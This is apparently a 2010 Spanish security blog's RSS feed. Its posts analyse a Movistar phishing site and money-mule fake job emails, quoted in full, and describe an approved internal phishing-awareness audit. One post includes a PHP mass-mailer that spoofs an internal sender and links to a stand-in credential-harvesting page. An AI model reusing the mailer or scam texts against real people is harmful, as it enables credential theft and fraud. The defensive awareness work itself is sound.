<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eidan&#039;s Hideout</title>
	<atom:link href="http://www.madgoblin.net/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.madgoblin.net</link>
	<description>...et vidit Deus lucem quod esset bona et divisit lucem ac tenebras...</description>
	<lastBuildDate>Fri, 09 Jul 2010 11:59:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Crackear passwords de wordpress con wordlists</title>
		<link>http://www.madgoblin.net/?p=221</link>
		<comments>http://www.madgoblin.net/?p=221#comments</comments>
		<pubDate>Fri, 09 Jul 2010 11:59:47 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=221</guid>
		<description><![CDATA[Me he encontrado con la necesidad de crackear unos passwords de wordpress con el sistema nuevo de hashing (ya no se utiliza MD5) y me he dado cuenta que no habia ninguna tool para ello EDIT: Si que habia De hecho el codigo magicamente se parece en un 99% Basicamente lo que hace es leer [...]]]></description>
			<content:encoded><![CDATA[<p>Me he encontrado con la necesidad de crackear unos passwords de wordpress con el sistema nuevo de hashing (ya no se utiliza MD5) y me he dado cuenta que no habia ninguna tool para ello <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>EDIT: Si que habia <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  De hecho el codigo magicamente se parece en un 99%</p>
<p>Basicamente lo que hace es leer linea a linea el archivo wordlist.lst y va probando cada password contra el hash que tenemos (hay que insertarlo dentro del codigo)</p>
<p>Si alguien se aburre o quiere jugar con el:</p>
<p><a href="www.madgoblin.net/bruteforcer.tar">www.madgoblin.net/bruteforcer.tar</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=221</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nuevo caso de phishing de Movistar</title>
		<link>http://www.madgoblin.net/?p=214</link>
		<comments>http://www.madgoblin.net/?p=214#comments</comments>
		<pubDate>Fri, 25 Jun 2010 09:43:45 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=214</guid>
		<description><![CDATA[Se esta realizando una nueva campaña de phishing con el asunto &#8220;Promociones Movistar: Recarga ahora y duplicamos el importe!&#8221; El mail original me lo paso un compañero del curro (thx Joan) y tiene esta pinta. Si se hace click en el mismo nos envia a una url un tanto sospechosa: http://canalcliente-movistar.info/**********/CCLI_CW_publico/pub/0,4093_259_43408951_0_0.00/index.htm Y aqui habilmente nos [...]]]></description>
			<content:encoded><![CDATA[<p>Se esta realizando una nueva campaña de phishing con el asunto &#8220;Promociones Movistar: Recarga ahora y duplicamos el importe!&#8221; El mail original me lo paso un compañero del curro (thx Joan) y tiene esta pinta.</p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1265.jpg"><img class="aligncenter size-medium wp-image-215" title="ScreenShot1265" src="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1265-300x153.jpg" alt="" width="300" height="153" /></a></p>
<p>Si se hace click en el mismo nos envia a una url un tanto sospechosa:</p>
<p>http://canalcliente-movistar.info/**********/CCLI_CW_publico/pub/0,4093_259_43408951_0_0.00/index.htm</p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1264.jpg"><img class="aligncenter size-medium wp-image-216" title="ScreenShot1264" src="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1264-300x213.jpg" alt="" width="300" height="213" /></a></p>
<p>Y aqui habilmente nos pediran los datos de la tarjeta, etc&#8230;</p>
<p>Todo esto seria perfecto para el tio que lo ha montado si no fuera porque es un &#8220;peliiiiinnn&#8221; chapucero <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Si empiezas a trastear con la url te puedes encontrar lo siguiente:</p>
<p><img src="file:///C:/DOCUME%7E1/TONI%7E1.GON/CONFIG%7E1/Temp/moz-screenshot.png" alt="" /><a href="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1266.jpg"><img class="aligncenter size-full wp-image-217" title="ScreenShot1266" src="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1266.jpg" alt="" width="948" height="168" /></a></p>
<p>¿¿¿logs.txt??? No&#8230; no sera tan cutre&#8230; pero no <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  TAN TAN CUTRE NO ES, ya que esta vacio.. ohh que pena <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>PERO</p>
<p>Si entro en el directorio &#8220;0,4093_259_43408951_0_0.00&#8243;  me sale la pagina de phishing&#8230; ummm no&#8230; ese archivo de logs NO existira dentro del directorio&#8230; ¿verdad?</p>
<p><a href="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1268.jpg"><img class="aligncenter size-full wp-image-218" title="ScreenShot1268" src="http://www.madgoblin.net/wp-content/uploads/2010/06/ScreenShot1268.jpg" alt="" width="379" height="189" /></a></p>
<p>Lo dicho&#8230; tened cuidado ahi fuera <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=214</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mas phishing</title>
		<link>http://www.madgoblin.net/?p=212</link>
		<comments>http://www.madgoblin.net/?p=212#comments</comments>
		<pubDate>Wed, 14 Apr 2010 14:32:29 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=212</guid>
		<description><![CDATA[¿Es muy complicado enviar emails de phishing de una forma automatica? Pues va a ser que no De hecho el codigo que utilice para la auditoria interna es mas o menos este: &#60;? $body = &#8220;&#60;html&#62;&#60;body&#62;&#60;h1&#62;&#60;a href=&#8217;http://www.ev1lh4cker.com/login.htm&#8217;&#62;&#60;img src=&#8217;http://www.ev1lh4cker.com/lolcat.jpg&#8217; border=&#8217;0&#8242; alt=&#8217;Click here for more lolcats&#8217; &#62;&#60;/a&#62;&#60;/html&#62;&#8221;; echo $body; $myFile = &#8220;listaemails.txt&#8221;; $fh = fopen($myFile, &#8216;r&#8217;); while [...]]]></description>
			<content:encoded><![CDATA[<p>¿Es muy complicado enviar emails de phishing de una forma automatica?</p>
<p>Pues va a ser que no <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  De hecho el codigo que utilice para la auditoria interna es mas o menos este:</p>
<table style="height: 561px;" border="1" cellspacing="0" cellpadding="0" width="548">
<tbody>
<tr>
<td width="576" valign="top">&lt;?<br />
$body = &#8220;&lt;html&gt;&lt;body&gt;&lt;h1&gt;&lt;a   href=&#8217;http://www.ev1lh4cker.com/login.htm&#8217;&gt;&lt;img<br />
src=&#8217;http://www.ev1lh4cker.com/lolcat.jpg&#8217; border=&#8217;0&#8242; alt=&#8217;Click here for   more lolcats&#8217;<br />
&gt;&lt;/a&gt;&lt;/html&gt;&#8221;;<br />
echo $body;</p>
<p>$myFile = &#8220;listaemails.txt&#8221;;<br />
$fh = fopen($myFile, &#8216;r&#8217;);<br />
while (!feof($fh))<br />
{<br />
$theData = fgets($fh);<br />
echo &#8220;Sending to: $theData \r\n&#8221;;</p>
<p>$smtp_server = fsockopen(&#8220;smtp.victim.com&#8221;, 25, $errno,   $errstr,30);<br />
if(!$smtp_server)<br />
{<br />
exit;<br />
}<br />
fwrite($smtp_server, &#8220;HELO its_me\r\n&#8221;);<br />
echo fgets($smtp_server);<br />
fwrite($smtp_server, &#8220;MAIL FROM:&lt;RRHH@victim.com&gt;\r\n&#8221;);<br />
echo fgets($smtp_server);<br />
fwrite($smtp_server, &#8220;RCPT TO:&#8221;. $theData . &#8220;\r\n&#8221;);<br />
echo fgets($smtp_server);<br />
fwrite($smtp_server, &#8220;From: manolo &lt;manolo@victim.com&gt;\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;To: FlowerpowerUser &lt;flower@victim.com&gt;\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;Subject: Funny lolcat picture \r\n&#8221;);<br />
fwrite($smtp_server, &#8220;Mime-Version: 1.0;\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;Content-Type:   text/html;charset=ISO-8859-1;\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;Content-Transfer-Encoding: 7bit;\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;$body\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;.\r\n&#8221;);<br />
fwrite($smtp_server, &#8220;.\r\n&#8221;);<br />
echo &#8220;&#8212;&#8212;&#8212;\r\n&#8221;;<br />
}<br />
fclose($fh);<br />
?&gt;</td>
</tr>
</tbody>
</table>
<p>A este codigo le faltan algunas lineas, asi que NO funciona a menos que sepais del tema, en cuyo caso no necesitareis utilizarlo de todas formas <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Hasta esta mañana creia que todo este mundillo del phishing era una perdida de tiempo. Como mucho funcionaba con un1% de la gente a la quien se lo enviabas&#8230;. pero estaba equivocado. <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>Algunos datos interesantes que puedo explicar:</p>
<ul>
<li>Exito de un 23% de los emails enviados</li>
<li>Se tardo unos 3 minutos en que alguien avisara a los responsables de seguridad</li>
<li>Se tardo 20 minutos en que alguien enviara un email a toda la empresa avisando del ataque</li>
<li>Un 50% de la gente hizo click en el email que habian recibido</li>
<li>Contra lo que yo me esperaba, habia gente de todos los departamentos</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=212</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Concienciacion sobre phishing.</title>
		<link>http://www.madgoblin.net/?p=191</link>
		<comments>http://www.madgoblin.net/?p=191#comments</comments>
		<pubDate>Wed, 14 Apr 2010 14:06:44 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=191</guid>
		<description><![CDATA[En departamento de seguridad del trabajo hemos decidido hacer una serie de acciones de concienciacion para que los usuarios sepan &#8220;que hay ahi afuera&#8221;. La primera que tenemos en mente (quiza por lo facil o lo divertida que puede ser) sera explicar en que consiste el phishing, formas de detectarlo, razones por las que se [...]]]></description>
			<content:encoded><![CDATA[<p>En departamento de seguridad del trabajo hemos decidido hacer una serie de acciones de concienciacion para que los usuarios sepan &#8220;que hay ahi afuera&#8221;.</p>
<p>La primera que tenemos en mente (quiza por lo facil o lo divertida que puede ser) sera explicar en que consiste el phishing, formas de detectarlo, razones por las que se hace, etc&#8230; Pero antes de hacerlo, que mejor que efectuar un envio de mails a toda la empresa para intentar conseguir las credenciales de la gente. Dependiendo de los resultados podremos ver  antes de la formacion, el nivel de conocimientos de la gente y, si &#8220;cuela&#8221; el nivel de fortaleza de contraseñas que utilizan (que sera la siguiente formación en teoria)</p>
<p>Lo primero ha sido comentar el tema a direccion&#8230; Sin soporte de ellos nos podemos meter en un follon bastante gordo, pero por suerte les ha gustado la idea <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Primer tema OK</p>
<p>Lo segundo, comentarlo con el departamento legal. ¿why? Ya que vamos a guardar los nombres de usuarios y contraseñas de la gente sin su consentimiento, muy legal no era el tema <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  Por lo visto mientras no guardemos ningun tipo de relacion entre usuario-password estamos cubiertos. Tambien (por logica) se nos pide que avisemos a las &#8220;victimas&#8221; para que cambien su password una vez haya acabado el experimento.</p>
<p>Teniendo los OK&#8217;s necesarios, ahora solo nos queda por delante los temillas tecnicos de como c**o hacerlo <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Tenemos los conocimientos pero no hemos hecho estos temas &#8220;en serio&#8221; jamas jejejeje</p>
<p>El plan por el momento sera enviar un email que incite a hacer click en un link, y una vez en una pagina web hacer que el usuario escriba de alguna forma su usario y su password.</p>
<p>Registro el dominio &#8220;fake&#8221; del tipo www.NombreDeLaEmpresa.net.madgoblin.net &#8230;. ¿porque un subdominio en vez de un dominio directamente? Por dos razones: La primera es que queremos que los usuarios tengan alguna posibilidad de darse cuenta. La segunda, por que es muuuucho mas rapido y barato registrar un subdominio en los DNS, que tener que pedir presupuesto a la empresa para comprar un dominio <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  .</p>
]]></content:encoded>
			<wfw:commentRss>http://www.madgoblin.net/?feed=rss2&amp;p=191</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Ofertas de trabajo falsas</title>
		<link>http://www.madgoblin.net/?p=197</link>
		<comments>http://www.madgoblin.net/?p=197#comments</comments>
		<pubDate>Wed, 03 Mar 2010 11:39:27 +0000</pubDate>
		<dc:creator>Eidan</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.madgoblin.net/?p=197</guid>
		<description><![CDATA[En el trabajo nos hemos encontrado con unas campañas de phishing utilizando nuestra imagen. Despues de una pequeña investigacion he hecho el siguiente &#8220;informe&#8221; para el resto de la empresa&#8230; de todas formas creo conveniente que el resto de gente este informada &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- PASTE FROM EMAIL&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Version corta: Como dije anteriormente, lo que esta sucediendo [...]]]></description>
			<content:encoded><![CDATA[<p>En el trabajo nos hemos encontrado con unas campañas de phishing utilizando nuestra imagen. Despues de una pequeña investigacion he hecho el siguiente &#8220;informe&#8221; para el resto de la empresa&#8230; de todas formas creo conveniente que el resto de gente este informada <img src='http://www.madgoblin.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- PASTE FROM EMAIL&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Version corta:</strong></p>
<p>Como dije anteriormente, lo que esta sucediendo es una campaña para fichar gente que ayude a blanquear dinero.</p>
<p>La metodología es la siguiente:</p>
<p>1.- Una persona (desde ahora victima) recibe un correo con una oferta de trabajo.</p>
<p>2.- Dicha oferta contiene un email en su interior (<a href="mailto:cv@empleosupport.net">cv@empleosupport.net</a>, <a href="mailto:support@empleosupport.net">support@empleosupport.net</a>, <a title="blocked::mailto:espana@es-tr.net" href="mailto:espana@es-tr.net" target="_blank">espana@es-tr.net</a> , <strong><a title="blocked::mailto:info@es-tr.net" href="mailto:info@es-tr.net">info@es-tr.net</a></strong><strong> </strong>y <a href="mailto:info@espempleo.net">info@espempleo.net</a> )</p>
<p>3.- En el momento que establece contacto, se le propone a la victima el trabajo de “agente financiero”. Dicho empleo consiste en recibir cantidades de dinero de “clientes” en su cuenta de banco y reenviarlo utilizando western union o similar a la “sede central” en otro país quedándose antes un porcentaje como “comisión”</p>
<p>4.- La policía cuando sigue el rastro del dinero, llegara a la victima y se la declarara culpable de estafa. Dado que el envío del dinero sera a un destino “falso” se pierde la pista del dinero.</p>
<p><strong>Version larga:</strong></p>
<p>Hemos recibido por diversas fuentes, 3 emails falsos con apariencia de bolsas de empleo (Infojobs y monster por el momento).</p>
<p>Fuente: Candidato avisando del email que ha recibido</p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="576" valign="top">&#8212;&#8212;&#8212;-   Mensaje reenviado &#8212;&#8212;&#8212;-<br />
De: <strong>Balfour TITTLE</strong> &lt;<a title="mailto:bBalfour6TITTLEF@hotmail.com" href="mailto:bBalfour6TITTLEF@hotmail.com">bBalfour6TITTLEF@hotmail.com</a>&gt;<br />
Fecha: 1 de marzo de 2010 18:51<br />
Asunto: OFERTA DE EMPLEO<br />
Para:CENSORED<a title="mailto:elcajaster@gmail.com" href="mailto:elcajaster@gmail.com"></a></p>
<p><a title="http://www.infojobs.net/ InfoJobs.net" href="http://www.infojobs.net/" target="_blank"><strong>¡Error! Nombre de archivo no especificado.</strong></a></p>
<p>Lunes   1 de marzo 2010</p>
<h2>Juan Martinez te envía una oferta de empleo</h2>
<p>Buenas   tardes,<br />
En primer lugar permitame que me presente, soy Antonio   Lacerdon, responsable de recursos humanos  de la compania ORO   PLATA, nuestra empresa es una de las mayores companias de    almacenamiento  y exportacion de oro, plata y metales preciosos, con   base en Inglaterra y filiales en todo el Mundo.<br />
Nuestro departamento de seleccion de personal, conoce de su interes en un   puesto de trabajo estable, informacion que hemos podido observar en alguno de   los portales mas importantes para la busqueda de empleo en Espana.<br />
Somos uno de los principales distribuidores en Espana y Portugal de Oro de   inversion, exento de IVA, procedente de Suiza. Compra y venta a particulares   y empresas.<br />
Ofrecemos metales preciosos, traidos directamente de la cantera suiza PAMP   SA, a precios actuales de mercado.<br />
Comercializamos un amplio surtido de lingotes de oro, plata, platino y   paladio desde 2,5    gramos hasta 1000 gramos/1 kg de peso. Tambien   disponemos de una gran variedad en monedas como el Krugerrand, la Filarmonica de   Viena, el Maple Leaf y el Australian Nugget todas de una onza.<br />
Nuestros clientes son clientes anonimos que desean invertir en metales   preciosos porque consideran que es la mejor inversion en estos momentos.   Nuestra compania se ocupa de toda la gestion de compra importacion y busqueda   de las mejores oportunidades para nuestros clientes.<br />
En estos momentos disponemos de varias vacantes para trabajar en su pais.<br />
Necesitamos con urgencia agentes financieros   que puedan realizar transacciones bancarias diarias para nuestros clientes,   trabajando como intermediario entre el cliente y el vendedor.<br />
Quisieramos contar con usted en nuestro proceso de seleccion, en este trabajo   que podra desempenar a distancia desde cualquier punto del territorio Espanol, pero para poder entrar en el   proceso de seleccion inmediato, es imprescindible que usted nos haga llegar   lo mas rapidamente posible su CV, actualizado a la direccion de correo   electronico siguiente:</p>
<p><strong><a title="mailto:cv@empleosupport.net" href="mailto:cv@empleosupport.net">cv@empleosupport.net</a> </strong><br />
una vez recibido su CV, uno de nuestros responsables de seleccion se pondra   en contacto con usted para informarle de los requisitos y oportunidades que   se adapten a su perfil, asi como toda la informacion respecto a nuestra   compania.<br />
Nuestras plazas vacantes son limitadas, le rogamos sea usted rapido en el   envio de su curriculum.<br />
Atentamente.<br />
Antonio Lacerdon<br />
Responsable del proceso de seleccion de personal<br />
ORO PLATA COMPANY</p>
<p>En   cumplimiento de la normativa vigente en materia de Servicios de la Sociedad de la Informacion y de   Comercio Electronico y de Proteccion de Datos de Caracter Personal, te   informamos que puedes revocar en cualquier momento, de forma sencilla y   gratuita, el consentimiento para la recepción de mensajes promocionales de <a title="http://infojobs.net/" href="http://infojobs.net/">InfoJobs.net</a>,   dando de baja <a title="http://www.infojobs.net/candidato-login.xhtml" href="http://www.infojobs.net/candidato-login.xhtml" target="_blank">tus suscripciones</a> o bien dándote de <a title="http://www.infojobs.net/candidato-login.xhtml" href="http://www.infojobs.net/candidato-login.xhtml" target="_blank">baja del servicio</a> de <a title="http://infojobs.net/" href="http://infojobs.net/">Infojobs.net</a> a traves del Menu privado. Por favor no   respondas a este e-mail directamente.</p>
<p>INFOJOBS, S.A. CIF: A-62134309. Domicilio social en C/ Numancia 46. 08029   Barcelona.</p>
<hr size="2" />Your E-mail and More On-the-Go.   Get Windows Live Hotmail Free. <a title="https://signup.live.com/signup.aspx?id=60969" href="https://signup.live.com/signup.aspx?id=60969" target="_blank">Sign up now.</a></td>
</tr>
</tbody>
</table>
<p>Foro hablando sobre el email con skin de monster</p>
<p>Fuente: <a href="http://camyna.com/2010/02/12/oferta-de-trabajo-falsa/">http://camyna.com/2010/02/12/oferta-de-trabajo-falsa/</a></p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="576" valign="top">Hay un correo que llega aparentando ser de   Monster y que es una oferta falsa de trabajo.</p>
<p>El correo dice asi:</p>
<p><strong>Buenas tardes,</strong></p>
<p>Nuestro   departamento de recursos humanos ha podido averiguar su interes en un puesto   de trabajo<br />
estable a traves de uno de los portales mas importantes de internet para busqueda   de empleo.<br />
En primer lugar permitame que me presente, soy JUAN   CARLOS FERRER, responsable del departamento de<br />
recursos humanos de una gran compania de importacion, almacenamiento y   exportacion de oro, plata<br />
y metales preciosos, con base en Inglaterra y filiales en todo el Mundo.   Somos uno de los<br />
principales distribuidores en Espana y Portugal de Oro de inversion, exento   de IVA,<br />
procedente de Suiza. Compra y venta a particulares y empresas. Ofrecemos   metales preciosos,<br />
traidos directamente de la refineria suiza PAMP SA, a precios actuales de   mercado. Los precios<br />
de venta son actualizados en sintonia con la cotizacion del Mercado de   Londres.<br />
Comercializamos un amplio surtido de lingotes de oro, plata, platino y   paladio desde 2,5<br />
gramos hasta 1000 gramos/1 kg de peso. Tambien disponemos de una gran   variedad en monedas<br />
como el Krugerrand, la    Filarmonica de Viena, el Maple Leaf y el Australian Nugget   todas de una onza.<br />
Nuestros clientes son clientes anonimos que desean invertir en metales   preciosos porque<br />
consideran que es la mejor inversion en estos momentos. Nuestra compania se   ocupa de toda la<br />
gestion de compra importacion y busqueda de las mejores oportunidades para   nuestros clientes.<br />
En estos momentos disponemos de varias vacantes en una de las mas grandes   companias que se ocupa<br />
de realizar la gestion que le hemos explicado anteriormente.<br />
Tenemos varios puestos de agentes financieros   cuyas funciones son realizar transacciones bancarias<br />
diarias para nuestros clientes, trabajando como intermediario entre el   cliente y el vendedor.<br />
Quisieramos contar con usted en el proceso de seleccion, este trabajo Ud   podra desempenarlo a<br />
distancia desde cualquier punto del territorio Espanol,   pero para poder entrar en el proceso de<br />
seleccion inmediatamente, es imprescindible que usted nos haga llegar lo mas   rapidamente posible<br />
su CV, actualizado a la direccion de correo electronico siguiente:</p>
<p><a href="mailto:info@espempleo.net" target="_blank">info@espempleo.net</a></p>
<p>al recibir su CV,   uno de nuestros responsables de seleccion se pondra<br />
en contacto con usted para informarle de los requisitos y oportunidades que   se adapten a su perfil.</p>
<p>Le agradecemos su   atencion y esperamos contar con usted en muy breve espacio de tiempo.<br />
JUAN CARLOS FERRER<br />
Responsable del proceso de seleccion de personal</p>
<p>Viene con los logotipos de   Monster, e incluso con un pie de correo, con todos los datos aperentemente de   ese portal de empleo. Sin embargo, tanto el texto, como la dirección de   correo son sospechosos.</td>
</tr>
</tbody>
</table>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="576" valign="top">De: <strong>Irma GARRIGA</strong> &lt;<a title="blocked::mailto:icIrmaP9GARRIGA@hotmail.com" href="mailto:icIrmaP9GARRIGA@hotmail.com" target="_blank">icIrmaP9GARRIGA@hotmail.com</a>&gt;<br />
Fecha: 1 de marzo de 2010 19:23<br />
Asunto: BUSCAMOS PROFESIONALES CON TOTAL DEDICACION<br />
Para:CENSORED<br />
<a title="http://www.infojobs.net/ InfoJobs.net" href="http://www.infojobs.net/" target="_blank"></a></p>
<p>Lunes 1 de marzo 2010</p>
<h2>Juan Martinez te envía una oferta de empleo</h2>
<p>Buenas tardes,<br />
En primer lugar permitame que me presente, soy Antonio Lacerdon, responsable   de recursos humanos  de la compania ORO PLATA, nuestra empresa es una de   las mayores companias de  almacenamiento  y exportacion de oro,   plata y metales preciosos, con base en Inglaterra y filiales en todo el   Mundo.<br />
Nuestro departamento de seleccion de personal, conoce de su interes en un   puesto de trabajo estable, informacion que hemos podido observar en alguno de   los portales mas importantes para la busqueda de empleo en Espana.<br />
Somos uno de los principales distribuidores en Espana y Portugal de Oro de   inversion, exento de IVA, procedente de Suiza. Compra y venta a particulares   y empresas.<br />
Ofrecemos metales preciosos, traidos directamente de la cantera suiza PAMP   SA, a precios actuales de mercado.<br />
Comercializamos un amplio surtido de lingotes de oro, plata, platino y   paladio desde 2,5    gramos hasta 1000 gramos/1 kg de peso. Tambien   disponemos de una gran variedad en monedas como el Krugerrand, la Filarmonica de   Viena, el Maple Leaf y el Australian Nugget todas de una onza.<br />
Nuestros clientes son clientes anonimos que desean invertir en metales   preciosos porque consideran que es la mejor inversion en estos momentos.   Nuestra compania se ocupa de toda la gestion de compra importacion y busqueda   de las mejores oportunidades para nuestros clientes.<br />
En estos momentos disponemos de varias vacantes para trabajar en su pais.<br />
Necesitamos con urgencia agentes financieros que puedan realizar   transacciones bancarias diarias para nuestros clientes, trabajando como   intermediario entre el cliente y el vendedor.<br />
Quisieramos contar con usted en nuestro proceso de seleccion, en este trabajo   que podra desempenar a distancia desde cualquier punto del territorio   Espanol, pero para poder entrar en el proceso de seleccion inmediato, es   imprescindible que usted nos haga llegar lo mas rapidamente posible su CV,   actualizado a la direccion de correo electronico siguiente:</p>
<p><strong><a title="blocked::mailto:espana@es-tr.net" href="mailto:espana@es-tr.net" target="_blank">espana@es-tr.net</a> </strong><br />
una vez recibido su CV, uno de nuestros responsables de seleccion se pondra   en contacto con usted para informarle de los requisitos y oportunidades que se   adapten a su perfil, asi como toda la informacion respecto a nuestra   compania.<br />
Nuestras plazas vacantes son limitadas, le rogamos sea usted rapido en el   envio de su curriculum.<br />
Atentamente.<br />
Antonio Lacerdon<br />
Responsable del proceso de seleccion de personal<br />
ORO PLATA COMPANY</p>
<p>En cumplimiento de la normativa vigente en   materia de Servicios de la    Sociedad de la Informacion y de Comercio Electronico y de   Proteccion de Datos de Caracter Personal, te informamos que puedes revocar en   cualquier momento, de forma sencilla y gratuita, el consentimiento para la   recepción de mensajes promocionales de InfoJobs.net, dando de baja <a title="http://www.infojobs.net//candidato-login.xhtml" href="http://www.infojobs.net/candidato-login.xhtml" target="_blank">tus suscripciones</a> o bien dándote de <a title="http://www.infojobs.net//candidato-login.xhtml" href="http://www.infojobs.net/candidato-login.xhtml" target="_blank">baja del servicio</a> de Infojobs.net a traves   del Menu privado. Por favor no respondas a este   e-mail directamente.</p>
<p>INFOJOBS, S.A. CIF: A-62134309. Domicilio social en C/ Numancia 46. 08029   Barcelona.</td>
</tr>
</tbody>
</table>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td width="576" valign="top"><strong>De:</strong> stanleyhdisidoroz@hotmail.com   [mailto:stanleyhdisidoroz@hotmail.com]<br />
<strong>Enviado el:</strong> lunes, 01 de marzo de 2010 19:26<br />
<strong>Para:</strong> CENSORED<br />
<strong>Asunto:</strong> OFERTA DE EMPLEO</p>
<p><a title="InfoJobs.net" href="http://www.infojobs.net/"></a></p>
<p>Lunes 1 de marzo 2010</p>
<h2><strong>Juan Martinez te envía una oferta de empleo</strong></h2>
<p>Buenas tardes,<br />
En primer lugar permitame que me presente, soy Antonio   Lacerdon, responsable de recursos humanos  de la compania ORO   PLATA, nuestra empresa es una de las mayores companias de    almacenamiento  y exportacion de oro, plata y metales preciosos, con   base en Inglaterra y filiales en todo el Mundo.<br />
Nuestro departamento de seleccion de personal, conoce de su interes en un   puesto de trabajo estable, informacion que hemos podido observar en alguno de   los portales mas importantes para la busqueda de empleo en Espana.<br />
Somos uno de los principales distribuidores en Espana y Portugal de Oro de   inversion, exento de IVA, procedente de Suiza. Compra y venta a particulares   y empresas.<br />
Ofrecemos metales preciosos, traidos directamente de la cantera suiza PAMP SA,   a precios actuales de mercado.<br />
Comercializamos un amplio surtido de lingotes de oro, plata, platino y   paladio desde 2,5    gramos hasta 1000 gramos/1 kg de peso. Tambien   disponemos de una gran variedad en monedas como el Krugerrand, la Filarmonica de Viena,   el Maple Leaf y el Australian Nugget todas de una onza.<br />
Nuestros clientes son clientes anonimos que desean invertir en metales   preciosos porque consideran que es la mejor inversion en estos momentos.   Nuestra compania se ocupa de toda la gestion de compra importacion y busqueda   de las mejores oportunidades para nuestros clientes.<br />
En estos momentos disponemos de varias vacantes para trabajar en su pais.<br />
Necesitamos con urgencia agentes financieros   que puedan realizar transacciones bancarias diarias para nuestros clientes,   trabajando como intermediario entre el cliente y el vendedor.<br />
Quisieramos contar con usted en nuestro proceso de seleccion, en este trabajo   que podra desempenar a distancia desde cualquier punto del territorio   Espanol, pero para poder entrar en el proceso de seleccion inmediato, es   imprescindible que usted nos haga llegar lo mas rapidamente posible su CV,   actualizado a la direccion de correo electronico siguiente:</p>
<p><strong>support@empleosupport.net</strong><strong> </strong><br />
una vez recibido su CV, uno de nuestros responsables de seleccion se pondra   en contacto con usted para informarle de los requisitos y oportunidades que   se adapten a su perfil, asi como toda la informacion respecto a nuestra   compania.<br />
Nuestras plazas vacantes son limitadas, le rogamos sea usted rapido en el   envio de su curriculum.<br />
Atentamente.<br />
Antonio Lacerdon<br />
Responsable del proceso de seleccion de personal<br />
